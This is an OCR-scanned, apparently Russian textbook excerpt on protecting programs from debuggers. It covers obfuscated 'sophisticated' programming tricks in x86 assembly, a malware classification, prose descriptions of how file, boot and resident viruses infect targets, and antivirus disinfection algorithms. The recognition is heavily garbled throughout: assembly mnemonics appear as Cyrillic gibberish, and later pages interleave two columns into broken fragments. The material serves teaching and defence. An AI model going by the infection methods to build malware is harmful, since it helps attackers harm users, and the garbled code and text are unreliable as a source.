Борьба с отладчиками защищенного режима 


ризВЕ 

рор ах 

разНЕ 

рор Ьх 

зир ах, ЪХ 

ааа Ве1пареридаеЧ, ах 


Другие приемы против отладчиков защищенного режима основаны на предоставля 
мых ими АР!. Так, РеСмсКег, предоставляя АР! по ПМТ 151 (функции ОЕЁхх), намертво 
зависает на конструкции: 


поу ах, ОЕРО1В 


106 156 

Третья группа приемов борьбы с отладчиками защищенного режима заключается 
в искажении состояния аппаратных отладочных средств. Так, если известно, что для 
трассировки программы применяется регистр РЕ], то можно исказить либо его значе- 
ние, либо значение управляющих битов в регистре ОВ7. Однако уже есть отладчики 
(РеСбшсКег 0.05), которые сами используют отладочные регистры, а отлаживаемой про- 
грамме использовать их не дают, эмулируя обращение к ним. 

И наконец, четвертая группа приемов против отладчиков защищенного режима осно" 
вана на использовании ошибок конкретных отладчиков. Так, Зой-СЕ (по крайней мере 
некоторые версии) некорректно обрабатывает команды обращения к регистру РЕ7, что 
позволяет ловить его на таком, например, фрагменте кода: 


поу еах, Чг7 


20001 


ог еах, 


# 
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ПОСЕВ РОСОРОВАВООВО О чине рн иачовованана 241 
сч 4г7, еах 
оу еах, 9:7 
"2 важ, 20008 
212 РераддехМос Роза ; Ветка нормальной работы 


Дальше идут команды реакции на отладчик или, допустим, взведения флага такой реакции. | 


| 


3.1.6. "Изошренное" программирование 


Приемы защиты программ от отладчиков и дизассемблеров для программирования 
залач ответственного целевого назначения, конечно, хороши. Но, как уже отмечалось, 
абсолютно надежных защит не бывает, и поскольку задача разработчика защиты -— выну- 
дить противника потратить на взлом время, достаточное для принятия контрмер, только 
противоотладочными трюками ограничиваться не нужно. Нелишне также затруднить 
исследование программы и после того, как противник обойдет или устранит все ловушки 
для хакерского инструментария. 

Для этого необходимо сделать программу высокочитабельной для нас, но малопонят- 
чой в дизассемблированном виде, а под отладчиком — создающей впечатление хаотично- 
го набора условных и безусловных переходов. Эта задача решается применением так 
называемого "изошренного" программирования. 

Можно выделить несколько основных направлений: 


# экзотическая, имеющая необычный вид реализация алгоритмов с использованием 


редких команд процессора или их нестандартных сочетаний; 

реализация нескольких полностью эквивалентных вариантов одного и того же алго- 
ритма, при каждом обращении к которому случайным образом выбирается один из 
вариантов его реализации; 

засорение кода "мусором" — командами, не влияющими на обработку наших данных 
(кроме некоторого увеличения времени обработки на "засоренных" участках). 


Рассмотрим эти приемы подробнее. 


Экзотическая реализация алгоритмов. Допустим, у нас есть некоторый флаг (или 
переменная), для которого критически важна проверка на 0. Однако мы не желаем явно 
писать команду СМР АХ, 0 и вообще по возможности хотим обойтись без команд пере- 
дачи управления. 

Первое, что приходит в голову — использовать команды, пригодные для неявной про- 
Верки на 0. Например, использовать команды двоично-десятичной арифметики. 
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; ====== Пример 3.14. ========етеньнаяяананынянян=н-=== 
оу ах, ОптЕ]ач 
Даа 
разВЕ 
рор ах ; Неявная проверка флага нуля 
апа ах, 408 
92 Е]аа1зйего 


Разумеется, в реальной программе получение флагов и проверка наличия флага нуля 
должны быть разнесены для все того же затруднения исследования. Однако этот вариант, 
хотя и применимый, относительно прост для взлома. 

Взлом значительно усложняется, если мы установим обработчик нулевого значения 
флага на ПМТ 0 (деление на 0), а проверку реализуем как деление чего-нибудь на значе. 
ние флага, загруженное в любой допустимый регистр. В этом случае никакого перехода 
на обработчик нулевого значения флага нет вообще, а кроме того, некоторые отладчики 
аварийно завершают программу при выполнении деления на 0. 

Заметим, что так можно реализовать и проверку ненулевых значений, вычитая их из 
значения нашей переменной и деля что-нибуль на результат. При этом, очевидно, значение 
нужно принудительно пересылать в любой допустимый регистр, а обработчик ПМТ 0 дол- 
жен представлять собой реализацию некоторого хеш-преобразования, возвращающегс 
индекс массива адресов точек входа в обработчики конкретных значений (или сам адрес). 


Реализация эквивалентных ветвей. Для затруднения исследования программы пол 
отладчиком польза от этого приема очевидна. В самом деле, если мы, находясь 
в отладчике, попадаем то на одну команду, то на несколько, это явно не упростит пони- 
мание алгоритма программы. 

Приведем простой пример. Операция МЕС (преобразование числа в дополнительный 
кол) эквивалентна исключающему ИЛИ со “всеми единицами" и инкременту результата. 
Напишем макрос, реализующий алгоритм с двумя возможными ветвями его выполнения. 








; = Пример 3.15. = 
р = = МЕС над 16-разрядным регистром. 
ХМЕС16 МАСКО — Вед 
]оса1  ХМ№МС2, ХМ№СО 
разй ах ; Используется процедурой Вапдом 


са11 Вапдощ ; Некоторая подпрограмма 
; генерации случайных или 
; псевдослучайных чисел 


спр а1, 30 
За ХМЕб2 . 
рор ах 
пед Вед 
Эпрз ХМЕбО 
ХМЕС2 
хох Вед, ОРРЕЕЬ 
1пс Вед 
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а а 


Это лишь простейший пример, относительно легко поддающийся анализу. Для затруд- 
нения анализа возможно: 


и увеличить число ветвей (реализуется не для всех алгоритмов); 


и реализовать ветви в виде обработчиков прерываний (ПМТ 1, ГМТ 3, ПМТ 4, [МТ 6 ит. д.) 
и обращаться к ним не напрямую, а путем создания соответствующих ситуаций (взведе- | 
нием флага ТЕ, засылкой команды ПМТ 3 на место заранее поставленного МОР, делени- 
ем наб ипр.), что, кстати, еще и расширит противоотладочную подсистему; 

и увеличить число проверок случайного числа. 





; Пример 3.16. 
; МЕС над 16-разрядным регистром. 
ХМЕбТ6 ° МАСВО Вед 
ТОСАЬ — ХМЕС1, ХМЕС2, ХМ 
разЬ ах ; Используется процедурой Вапдом 


са11 Вапбоп1 ; Некоторая подпрограмма 
; генерации случайных или 
; Псевдослучайных чисел 


стр а]!, 30 

За ХМЕС2 
ХМЕСТ: 

рор ах 

пед Вед 

)прз ХМЕСО 
ХМЕС2: 

рор ах 

разв ах 

са11 Вапдом2 ; Другой генератор 

сир ар, 73 

)ье ХМЕС1 

рор ах 

хог Вед, ОРЕЕЕН 

1пс Вед 
ХМЕСО 

ЕМОМ 


Вообще говоря, в "изошренном программировании" нет готовых рецептов. Здесь все 


зависит от разработчика конкретной защиты, от его фантазии и знания используемого 
процессора. 


Засорение кода. Под засорением кода будем понимать искусственное внесение в него 
команд, не имеющих отношения к реализуемому алгоритму, которое либо затрудняет его 


анализ, либо делает этот анализ более канительным, более утомительным и, следовательно, 
требующим больше сил и времени. 


и 
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Речь идет о манипуляции незадействованными регистрами; установке/сбросе Некоту. 
рых флагов, выполнении нескольких команд, на эти флаги не влияющих, с последую 
условным переходом, который на самом деле заведомо выполнится или заведомо не ву, 
полнится; обработке нескольких одинаковых структур, из которых только одна солержи, 
данные нашего алгоритма и т. д. Все это не только увеличивает объем дизассемблир,, 
ванного текста, но и отвлекает внимание от защищаемого алгоритма. 

Полезно засорять код еще и макросами или вызовами, эмулирующими вв, 
с клавиатуры команд Зой-Гсе, ТВ. или комбинаций клавиш распространенных отладчи. 
ков, или даже просто нажатие некоторых случайных клавиш. Очевидно, при этом нужно 
почистить буфер перед вызовом любой подпрограммы обращения к клавиатуре. 


3.2. 
3.2.1. 


Антивирус из вируса 


Классификация вирусов 
и других вредных программ 


Параметры классификации. Вредные программы можно классифицировать: 
по степени опасности; 

по заражаемым объектам; 

по методу заражения; 

по методу скрытия своего наличия в системе; 


по исходному языку программирования. 
Возможно расширение списка параметров классификации. 


Классификация по степени опасности. Вредные программы по степени опасности 
можно разделить на: | 

в безобидные, т. е. не содержащие в себе никаких деструктивных функций и проявляю- 
щиеся только размножением; 

№ безопасные, т. е. проявляющиеся сообщениями, видеоэффектами и пр.; 

# опасные, т. е. способные вызвать серьезные сбои в работе вычислительной системы, 
"засадить" пользователя в систему меню, выхода из которой нет или он сильно 
затруднен ит. д.; 

\ очень опасные, т. е. способные уничтожить информацию в файлах, системных областях 
на логических дисках, вызвать физическое повреждение железа, а также дропперы 
опасных по данной классификации программ, имеющих некоторое время замедления. 


ас" 
Классификация по заражаемым объектам. По объектам, используемым для Р 
пространения, вредные программы можно разделить на: 


Чи у 
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„ файловые вирусы, т. е. программы, которые тем или иным способом присоединяются 
к файлам; 

я загрузочные вирусы, т. е. программы, записывающие свой код в системные области 
дисков; ^ 


в сетевые вирусы, или "черви“, т. е. программы, которые тем или иным способом пере- 
сылают свои копии по вычислительным сетям; 


и "троянские кони", т. е. программы, которые замаскированы под какие-либо безврел- 
ные программы; могут также дописываться к файлам, системным областям или сете- 
вым сообщениям по алгоритмам соответствующих вирусов, но для этого требуется 
специальная программа "приваживания"; сами троянцы возможности саморазмноже- 
ния не имеют; 

в "логические бомбы", т.е. запрограммированные разработчиком нормальной по идее 
программы троянские компоненты, срабатывающие лишь по определенному условию 
(например, при отсутствии ключевой информации на 0-й дорожке винчестера). 


Классификация по методу заражения. Различные вредные программы различным 
образом классифицируются по методу заражения объекта-жертвы. 
Файловые вирусы по этому параметру делятся на: 


вирусы-спутники, которые тем или иным образом переименовывают файл-жертву 
(обычно меняют расширение) и записывают себя в файл с прежним именем жертвы; 

# замещающие вирусы, которые записывают себя поверх файла-жертвы, не сохраняя его 

старого содержимого (очевидно, все замещающие вирусы относятся к очень опасным); 

й пристыковывающиеся вирусы, или паразитические вирусы, которые дописывают себя 
к программе таким образом, что сначала получает управление код вируса, а затем он вы- 
зывает код жертвы (методы пристыковки и передачи управления коду жертвы зависят от 
форматов исполнимых файлов в конкретной ОС и здесь не рассматриваются, равно как 
и системно-независимый алгоритм, реализуемый чаще всего в НГТР вирусах); 


Загрузочные вирусы по этому параметру бывают: 


№ сохраняющие код загрузчика в какой-то редко используемый сектор (например, на 0-й 
дорожке) и передающие на него управление; 

® замещающие код загрузчика и берущие все его функции на себя (по определению все 
такие вирусы относятся к опасным, так как антивирус вынужден записывать в сис- 
темную область хранимый внутри стандартный загрузчик). 
Троянцы по этому параметру бывают: 

\ автономные, т. е. замаскированные под полезную программу тем или иным способом; 

р 


пристыковочные, т. е. дописываемые с помощью программы-дроппера к нормальным 
выполнимым файлам; 








арок и у юри поно кои о вов во корка Бао наи оно виа зтиния осу аво сое ви бое позови звони и оно нос во соо ово о отавиьи 


быть скомбинированы. 
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№ "приваживаемые", т. е. злоумышленник должен добавить в файлы системной кон | 
гурации команды активизации троянца, записанного им на компьютер-жертву вру. 
ную или по сети. 


Классификация по методу скрытия своего нахождения в системе. По методу СКры. 
тия своего наличия в системе вирусы бывают: 

Ш не скрывающие своего наличия в системе; 

ы шифрующиеся, т. е. их исполнимый код шифруется со случайно полбираемым КЛЮЧОМ 
при заражении каждой новой жертвы, однако расшифровщик всегда один и тот же; 

# полиморфные, т. е. при заражении каждой новой жертвы вирус шифруется по случайных 
образом сгенерированному ключу и модифицирует расшифровшик (две копии такого ви. 
руса могут не иметь ни одного совпадающего байта); 

Ш "невидимые" ("стелс") вирусы, т. е. резидентные вирусы, которые перехватывают 
системные прерывания и маскируют свое наличие в системе (например, при обраце. 
нии к зараженному файлу возвращают его длину без учета длины вируса). "Невиди. 
мыми" не совсем правильно называют макровирусы, блокирующие доступ к меню 
управления макросами (это вовсе не "стелс", а противоотладочная компонента). 


Свойства "невидимости" и полиморфности (или самозашифровки) могут, очевидно, 

Другие программы вредоносного характера, как правило, не принимают каких-либо мер 
скрытия своего наличия в системе. Однако есть троянцы, которые при каждой новой при. 
стыковке перешифровываются дроппером. "Приваживаемых" троянцев можно, очевидно, 
вручную перешифровать и/или перепаковать перед занесением к новому пользователю. 


Классификация по исходному языку программирования. Вредные прогр 
могут быть написаны на; 


Ж языке Ассемблера; 

Ш языке высокого уровня; 

№ командном языке ОС; 

№ встроенном языке/макроязыке прикладного программного комплекса. 
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ха 


3.2.2. Алгоритмы заражения 


3.2.2.1. Стандартные алгоритмы заражения файловыми 
вирусами 


Вирусы-спутники заражают программу, никак не изменяя содержимое программного 

айла. Существуют два алгоритма заражения вирусом-спутником. Первый из них осно- 
ван на том, что командный процессор РОЗ при вводе имени запускаемой программы без 
расширения сначала ищет файл с расширением СОМ, затем ЕХЕ, и в последнюю оче- 
рель — ВАТ. Такой вирус-спутник, найдя ЕХЕ-файл, просто создает файл с тем же име- 
нем и расширением СОМ. Активность таких вирусов полностью или почти полностью 
парализуют обычные файловые оболочки типа УС/ОМ/ХС, которые по клавише ЕМТЕВ 
запускают выполнимый файл с указанием расширения. 

Второй алгоритм заражения вирусами-спутниками основан на том, что ограничения 
на расширение выполнимого файла накладывает только командный процессор. Функции 
же 2О$, загружающие и выполняющие программу, позволяют запускать на выполнение 
файлы с любым расширением. Вирус-спутник, реализующий данный алгоритм, находит 
ЕХЕ-файл, переписывает его содержимое в файл с тем же именем и другим расширени- 
ем, ав ЕХЕ-файл записывается код вируса. Расширение, под которым хранится про- 
грамма-жертва, может быть либо стандартным, либо оно дописывается в конец ЕХЕ- 
файла, после кода вируса (в этом случае вирус должен знать свою длину — для вирусов на 
Ассемблере это просто, для Н.С (Не 1.еуе! Т.апгиаре, Сотрашоп) вирусов требуется 
смотреть размер готового файла вируса, править, если надо, константу в исходном тек- 
сте, перекомпилировать вирус заново и заново его сжимать). 

Вариацией второго алгоритма является заражение с более сложной манипуляцией 
файлами. Здесь используются уже не два, а три расширения. Передавая управление про- 
Грамме-жертве, вирус сохраняет себя в файл с некоторым третьим расширением, копи- 
рует программу-жертву в ЕХЕ-файл, запускает его, а после завершения программы- 
жертвы опять копирует себя в ЕХЕ-файл. Файл с третьим расширением удаляется. 

Вирусы, использующие этот алгоритм, могут быть опасными или даже очень опас- 
НЫми уже из-за выбора расширений. Если файл-жертва копируется, допустим в расши- 
рение ОУК без проверки наличия внешнего оверлея, то любая программа, загружающая 
ОУВ-файлы, автоматически станет неработоспособной. 

Замещающие вирусы просто переписывают себя в начало исполнимого файла, не со- 


храняя старого содержимого. Восстановление таких файлов невозможно, если только нет 
Резервной копии. 


. 


При заражении выполнимого файла вирус, очевидно, должен дописать свой код к этому 
Алу, запомнить точку входа в программу-жертву (если это не замещающий вирус) и из- 


Менить ее так, чтобы код вируса получил управление. Проще всего сделать это с РО5- 
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программами формата СОМ, так как они представляют собой двоичный образ выполним. . 
го кода в оперативной памяти. Существуют три стандартных алгоритма заражения СОМ. 
файлов — с записью в конец, в начало и в середину (если есть куда записываться). 

Вирус, стандартно дописывающийся в конец файла, вычисляет смещение точки вхо- 
в себя, запоминает первые несколько байт (обычно 3, реже 5 или 6) и записывает на. 
место команду передачи управления на себя. Завершаясь, вирус выполняет запомненн! . 
команды, либо (что более надежно) восстанавливает байты по адресу СЗ: 1008 и пере; 
ет туда управление, например, так: 


поу ах, 100. 
ризВ ах 
гекп 


Вирус, стандартно записывающийся в начало, копирует в конец файла кусок кодал. 
же длины. Затем, скопировав в не используемые вирусом и не содержащие кода и ди 
ных программ адреса команды восстановления исходной программы в памяти, вирус 
копирует этот кусок по адресу СЗ: 100} и передает управление на этот адрес. 

Вирусы, записывающиеся в середину файла, или заражают только те файлы, где есть 
забитые одним и тем же значением (например, нулями) области, превышающие вирус 
по размеру, или "раздвигают" файл, записывая свой код в освободившееся место. Пере- 
дача управления программе-жертве выполняется так же, как и у вирусов, стандартно ло- 
писывающихся в конец. 

Вирусы, заражающие структуризованные выполнимые файлы (М7 ЕХЕ, ГЕ ЕХЕ, 
ЕТЕ ит. д.), применяют более сложные алгоритмы заражения. 

Вообще вирус опасен, если он некорректно выявляет структуру выполнимого файла. 
Так, опасны все вирусы, выявляющие СОМ/ЕХЕ-файлы по расширению — они портят 
файлы, у которых расширение не соответствует внутренней структуре. 

Заражая структуризованный выполнимый файл, вирус анализирует поля заголовка, 
дописывает себя в конец файла (или затирает ненужную для выполнения секцию — так 
делают некоторые ОМХ-вирусы, заражающие ЕР) и модифицирует поля заголовка 
(точку входа, стек, размер последней секции ит. д.). Эта информация потом использует 

ся для передачи управления программе-жертве. 


3.2.2.2. Стандартные алгоритмы заражения загрузочными 
вирусами 


Загрузочные вирусы заражают системные области по трем стандартным алгоритмам. 

Первый алгоритм, используемый, например, вирусом "Вгаш", заключается в записи 
области-жертвы (и "хвоста" вируса, если вирус не помещается в один сектор) в свободный 
от файлов кластер, который помечается в ЕАТ как сбойный. 

Второй алгоритм, используемый, например, вирусом "Зюпе", — область-жертва копи" 
руется в неиспользуемые или редко используемые сектора. Иногда вирус форматирУ 
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на диске дополнительную дорожку (чаше всего при заражении дискет) и копирует 
область-жертву и "хвост" (если он есть) туда. 
Третий алгоритм — вирус нигде не сохраняет область-жертву. Такие вирусы загружа- 


ют0С самостоятельно, беря на себя функции загрузчика. Так заражает НМД, например. 
Тгоал.Зигри!зе.456. , 


3.2.2.3. Модификации алгоритмов заражения. 


Если алгоритм чистки вируса, заражающего файлы по одному из стандартных алго- 
ритмов, уже реализован в антивирусе, то реализация чистки нового вируса, использую- 
шего этот алгоритм — дело нескольких минут. Поэтому вирусописатели постоянно пыта- 
ются если не придумать новый алгоритм, то модифицировать существующий, усложняя 
вирусологам задачу. | 

Простейшее из их ухищрений — разделение вируса на две части. Вирус стандартно 
заражает файл, дописываясь в начало или середину, но сохраняет туда лишь часть своего 
кода, а оставшийся дописывает в конец. На самом деле вычистить такой вирус несложно 
так как обычно размеры этих двух кусков вируса не меняются от заражения к зараже- 
нию. Следовательно, надо отрезать "хвост", а затем чистить вирус как обычно. 

Задача резко усложняется, если вирус разделен на несколько подпрограмм и относит про- 
извольное число этих подпрограмм к "хвосту" при каждом новом заражении. Такой вирус, не 
оудучи м ое Не иметь ‹ фиксированных сигнатур не только относительно 

точки входа (впрочем, последнее бывает очень 
редко). Чистка такого вируса может потребовать либо проверки сигнатур каждой из этих под- 
программ с вычислением длин головы и хвоста, либо даже прохода от точки входа пою коман- 
дам вызова подпрограмм (если вирус может пермутировать, т. е.менять их местами и не те- 
рять при этом работоспособность). 
а сложнее чистка вирусов, "пятнающих" файл-жертву. Так, вирусы ОпеНай стан- 

дописывают в конец файла свой зашифрованный й 

ровщик сохраняется в о по 10 ыы ила ооиморфный расшиф- 

Псевдозагрузочные вирусы (наприме  ЗАРАЗА " о Е Не натрузочные сек 
и ых Ыб я р, А") поражают не загрузочные сектора, 
тс пы, нее в фиксированных областях на диске. Эти файлы залисы- 
О редко при этом модифицируется корневой каталог, в нем появля- 
тс р зараженного, но система его не видит — видит вирус, который 
мой прямую ‚ а вирус пишется поверх системного файла. Для чистки такого 

м рямое обращение к ЕАТ и корневому каталогу. 

озможно появление и других алгоритмов заражения или их модификаций. 


3.2.2.4. Алгоритмы заражения резидентными вирусами 


Ре 
ых ‘зилентные вирусы не обходят каталоги в поиске файлов, подходящих для зараже- 
` ни перехватывают системные прерывания (или - в других ОС — системные вызо- 
В ` 
› В число аргументов которых входит и имя файла (или его можно определить по дру- 


3ы) 
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гим аргументам). Резидентный вирус может заражать файлы при их открытии, закрыт 
переименовании, запуске на выполнение и т. д. Теоретически можно сделать вит 
заражающий файлы, например, при смене позиции в файле, но в перехвате таких фу 
ций для заражения - такой вирус был бы достаточно заметен уже по замедлению рабу 
машины. Системные функции типа смены позиции в файле перехватывают только ре. . 
дентные "стелс"-вирусы, чтобы не дать другим программам записать что-либо повер) 
кода вируса, испортив его. | 

Многократное заражение памяти делает вирус практически неработоспособным. Дей. 
ствительно, представим себе на машине вирус, запускавшийся уже из нескольких зара. 
женных программ. Резидентные копии вируса быстро забьют всю оперативную память, 
и машина либо повиснет, либо недопустимо замедлит работу. Поэтому любой резидент. 
ный вирус проверяет наличие своей установки. 

Существуют три алгоритма этой проверки. Первый алгоритм — перехват некоторого 
прерывания с введением новой функции "Я здесь", которую и вызывает вирус в начале 
своего выполнения. Второй алгоритм — сканирование памяти компьютера на предмет 
своих сигнатур — чаще всего применяется вирусами, записывающими резидентную 
копию в строго определенные адреса, например, в страницы видеопамяти с ненулевыми 
номерами (в расчете на пользователя, сидящего в текстовом видеорежиме 80+25). Одна: 
ко возможно и базирование относительно вектора перехватываемого прерывания при 
проверке сигнатуры. Третий алгоритм основан на том, что резидентные вирусы умен 
шают слово размера памяти РОЗ, например, ставят 639К вместо 640. Выполнение этого 
условия означает зараженность памяти (не обязательно данным вирусом). 


3.2.2.5. Опасность алгоритмов заражения НСТР вирусами 


НЫР (Нов Геуе! Гапгиаре, Рагаз с) вирусы представляют собой программы, нап 
санные на языке высокого уровня. В этом и заключается их главная опасность. 

Дело в том, что эти программы компилируются в исполнимый файл формата ЕХЁЬ 
который, в отличие от СОМ-файла, дампом кода программы в памяти не является. Се 
лать НЫГР-вирус, который читает себя из памяти и заражает исполнимый файл нормал» 
ным способом, т. е. дописывая себя к файлу, сохраняя точку входа в своем теле (для 16 
редачи управления программе-жертве) и модифицируя заголовок ЕХЕ - задача сложна 
требует высокой квалификации и хорошего знания используемого компилятора на Ур» 
не генерируемого им кода. Как бы парадоксально это ни звучало, вирус с нормальны" 
алгоритмом заражения проще написать на Ассемблере, чем на Паскале или Си. Авторы 
же НИ Р-вирусов Ассемблер, как правило, не знают и знать не хотят. Поэтому они В по’ 
давляющем своем большинстве реализуют примитивные алгоритмы заражения, которы" 
по сути дела, представляют собой неявные деструктивные функции. Причина этоге 
в том, что при заражении нового файла типичный НИ Р-вирус читает себя не из памят* 
а из того файла, откуда он запустился. 


‘ 


асщирений фа 
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Рассмотрим, что представляют собой эти алгор 


итмы и почем 
ирусы не могут быть безвредными даже теоретическ У отользующие их 


И. 


Алгоритмы заражения, используемые в НЕТР- 
ва однотипных алгоритма заражения, которые отли 
пособом копирования кода файла-жертвы 


рука Во втором але содержимое файла-жертвы дописывается полностью вко 
ритме из начала заражаемого файла "вырезается" нец 
то и вирус. Он дописывается в конец файла, а вирус читает НЫ не ео 
о тиа не  педусм рва и ооодившесся место. Иными словами, оба и 
релачи ей управления из тела в дификации ЕХЕ заголовка программы-жертвы, ни пе- 
иитывания копии вируса ыируса А РАВ, ЛМР ЕАК или ВЕТЕ, ни 
осто считы очередного файла. Копи 
выполнения же ааа ного файла, откуда вирус был  апущен. ое 
реписывает туда код заражен ритмов вирус создает некоторый исполнимый файл 
его. Известны и еще более  велепые ара и запускает этот файл, а потом удаляет 
арианты — например, вирус НИР.Муа 24.1299} 


создает такой Й Й 
оолает, исполнимый файл, потом создает ВАТ-файл, запускающий й 
этот файл и запускает созданный ВАТ-файл | ПИ орающий 


Рассмотрим, к к 
› к каким деструктивным пос 
ледст 
ритмы заражения. ПИАМ мо 


вирусах. НЫГР-вирусы используют 
чаются друг от друга только разным 


гут привести такого рода алго- 


Запаковка и распаковка исполнимых файлов 
НАР-вирусом, с точки зрения 0О$, представляет со 
грамму с "хвостом", который может быть оверлеем ил 
правило, уже запакован. Часть запаковщиков испол 
опции командной строки '-!, \/\УРАСК ит. д.) прос 
ито распознают файл с хвостом, либо не могут сжа 
рограммы, способные запаковать такой файл 

Относительно корректно сделанные НР 
запуске проверяют свою сигнатуру и, не найдя 
называются работать. Но это зачастую 
ОИ распаковки становится невычищаем 


Исполнимый файл, зараженный 
бой относительно короткую про- 
и чем-то еще. При этом вирус, как 
нимых файлов (РКГие, БТЕТ без 
то не пакуют такие файлы, так как 
ть уже запакованный вирус. Однако 


-вирусы (например, НЫР.Уапк.7991) при 
ее, сообщают об этом, просят распаковать 


не помогает. Тот же самый НГ Р.Уанк.7991 
ЫМ. 


Замещение ви 


исполнимых Л Р авто 
фай ов. НИ вирус, В р 


лях не имел гр 
Чожет оказаться очень ны иротраммирования деструктивных функций, на поверку 
ражения. как луч опасным, и это не следствие ошибок в реализации алгоритмо 
, ается с вирусами на Асс ы 
емб м 
айлы данных м лере. Нужные исполнимые файлы или 


т у р Ъ К ру =. гр р 
Ге) т быть стерты та МВ соми мотного [9] 
илов, которыми манипулирует вирус ы 
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Е 
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3.2.3. Классификация антивирусных средств 3.2.4. Алгоритмы чистки 

Все существующие антивирусные программы подразделяются на фаги, детекторы, 2.4.1. О 

| ревизоры, вакцины и резидентные сторожа. 3.2.4.1. Описание алгоритмов чистки 

| Фаг — это программа, обнаруживающая известные ей вирусы по сигнатурам, т. е. участ- Алгоритм чистки в общем случае обратен алгорит | 

| кам кода, характерным именно для этого вируса. При обнаружении вируса он либо вычи- СОМ-вирусы, записывающиеся в начало файла НН . заражения. | 

щается из файла (файлу при этом придается первоначальный вид или максимально близкий файлы по тем же алгоритмам, что и НЫГР вычищаются -вирусы и вирусы, заражающие 

к таковому), либо (если файл безвозвратно запорчен) он удаляется. При этом желательно кусков на те смещения, где им положено нахо дится простым переносом кода или его 

| "убить" его, чтобы после случайного восстановления вирус не мог быть запущен. Вирусы-спутники вычишаются переименованием файла- 

| Детектор также обнаруживает вирусы, но в отличие от фага не может их чистить. Сущест. этим может потребоваться считать из тела вируса расши ры обратно в ЕХЕ. Перед 

| вуют детекторы, которые при обнаружении вируса вызывают фаг, передавая ему необходи- файл-жертва, а если вирус шифрует его — то и ключ к шифр ©, под которым сохраняется 

| мые для чистки данные. Однако такой вариант явно не относится к числу самых удачных. Вирусы, замещающие программный код, портят файлы 6 

| Ревизор предназначен для контроля любых изменений на дисках, как-то: изменения можно только удалить. Для того чтобы вирус не запустился езвозвратно. Такие файлы 

| кода загрузочных областей, изменения разбиения диска, появления/удаления/изменения файла, есть смысл записать в его начало команду ВМТ 20. из восстановленного по ошибке 
файлов и т. д. Качественно разработанные ревизоры содержат также алгоритмы провер- Вирусы, алгоритмы заражения которыми основаны на 

ки оперативной памяти на отсутствие резидентно загруженных стелс-вирусов. Для обна- вычищаются сложнее. Однако все алгоритмы их в структуре исполнимого файла, 

| ружения конкретных вирусов по сигнатурам ревизор не предназначен. дующим нескольким шагам. ычищения из файлов сводятся к сле- 


Программная вакцина предназначена для защиты программ от заражения вирусами, 
проверяющими свое наличие в системе или в обрабатываемом файле. Это достигается 
установкой резидентных обработчиков прерываний, имитирующих ответ вирусов "Я уже 


1) Если вирус | ифрует я айти сигнатуру расшифровщика, считать к: 1 асшифрове ТЬ 
Н ы р 
тело вируса. Сиг нат ура не найдена — выход, повторно считать код. 


р 2) Прове 
| загружен", или дописыванием к незараженным файлам сигнатур, по которым вирус себя ) о ть наличие сигнатуры вируса. Сигнатура не найдена — выход, повторно с 
| находит. Если резидентные вакцины вполне применимы (особенно в условиях дефиците д. ) рно счи- 
| 
] времени, когда нужно блокировать активность вируса в к атчайший срок), то файловье 3) Считать из тел 
|| р ‚ когда ну р ру рат рок), то фай а вируса сохраненные поля заголовка программы-жертвь 
| в настоящее время безнадежно устарели. Вакцинировать файлы имело смысл в середине заголовок. ртвы, восстановить 
| 1980-х гг., когда существовало лишь несколько малочисленных семейств вирусов, мно 4) Удалить из программы код ви 
гие из которых проверяли зараженность даже не по сигнатуре в файле, а по определен его по нужным смещения руса, восстановить код самой программы, переписав 
| М. 
| ным его атрибутам (например, ставились 62 секунды времени создания). В настояще. В 
й ес ычищение из фай 
время, когда число вирусов измеряется десятками тысяч, вакцинирование файлов 6  воперативной файлов резидентных вирусов бессмысленно, пока они нах 
смысленно и просто физически невозможно из-за многократного наложения сигнату их ной памяти и могут заражать файлы повторно. Если в 9. тя 
. С з Г 
друг на друга по смешению относительно начала/конца/точки входа. а закрытии, то прогон антивируса не изменит вообще ничего ты аражает файлы при 
я я . ит 
| Резидентный сторож — это программа, отслеживающая обращения к системны' Из оперативной памяти включает в себя следующие действия: ритм вычишщения виру- 


функциям, характерным для алгоритмов заражения программы вирусом, и спрашивак 1) Вызвать функцию "Я здесь” ил 
и проверить наличие в памяти (по определенному 


щая у пользователя разрешение на их выполнение. Однако эти же функции (обращен! вдресу или по смещениям относительно вектора соо 
тветствующего прерывания) 
сиг- 


в 
| к файлам, форматирование сектора, установка резидентной программы и т. д.) актив! натуры вируса. Если вирус в памяти не об 
,. на _ 
| | используются и нормальными программами. Поэтому для всех существующих резиден’ 2) Считать из ви ружен — выход. 
Н .. . сн 
И ных сторожей характерны одни и те же недостатки — большое число ложных трев( ригинальног 6 ого обработчика прерывания или из системных переменных адрес 
| и назойливость сообщений. При этом конкретный резидентный сторож относительк в р ика. 
| . м бол осстановить обраб 
В легко обходится или модификацией его обработчиков в оперативной памяти, или оор обработчик прерывания, осв 
‚ освободить занятую вирусо 
м область памяти. 


щением к аппаратным ресурсам напрямую. 


) К тереть код вируса в памяти например ТЯМИ В начал вирусног о обработчика 
а; 
, , ну. Я . Ч о 

можно записать команду перехода на ориг инальный. 





С т резидентные вирусы, перехватывающие одно из прерываний (например, от 
оля пре ения освобождения векторов прерываний от вирусных ооработчи. 
ре о то именно эти вектора при чистке вируса в ОП должны быть обезврежены 
ик соображений вектора нужно поручать восстанавливать не функциями 
08 25. 5 осуществлять эти действия прямым обращением к таблице векторов. 
ОО торты вычищения загрузочного вируса включает в себя следующие шаги: 


при необходимо- 
1) Считать системную область, проверить наличие сигнатуры вируса (пр 
чи р 
сти — после расшифрования). Не найдено — выход. 


если вирус нигде их не 
2) Переписать сохраненный вирусом код в МВК или ВОт, а ру 
сохраняет — записать туда стандартный код из антивируса. 


3) Затереть "хвост" вируса на диске. 


3.2.4.2. Маскировка вирусов под другие вирусы или полезные 
программы 


аружению его сиг- 
Задача обнаружения любого компьютерного вируса сводится к оон нь ‚ст 
, 
и в зараженной программе. Перед этим могут потребоваться ра прова ко 
 тектирование полиморфного расшифровщика и генерация посл ь и 
р ифрования (или прогон вируса на эмуляторе до ны ео кода) авс м 
р так назыв 
программы 
з изменения заголовка 
внедрения вируса бе к 
_— еще и анализ команд передачи управления из точки о вирусом  гнатуру и веме 
сов, зная использованную данным и тур 
жение в данном. с Б, содержащий ту же сигнатуру 
асположение в данном вирусе А, могут написать вирус >, дн 
стор же смешению от начала/конца/точки входа. Это может привес ви 
чист, й е знающей в . 
чистке файлов старой версией полифага, знающей вирус Аин 
т 
Возможны и другие "обманки". 


сигнатура не 
Почему это возможио. Одну из причин мы уже назвали. Как ель 
ие найден 
нным, если 
. с считается обнаруже , р 
тся копией вируса, и виру алан 
я ордтельность байт по заданному (или вычисляемому по 6 бя гор кт ры 
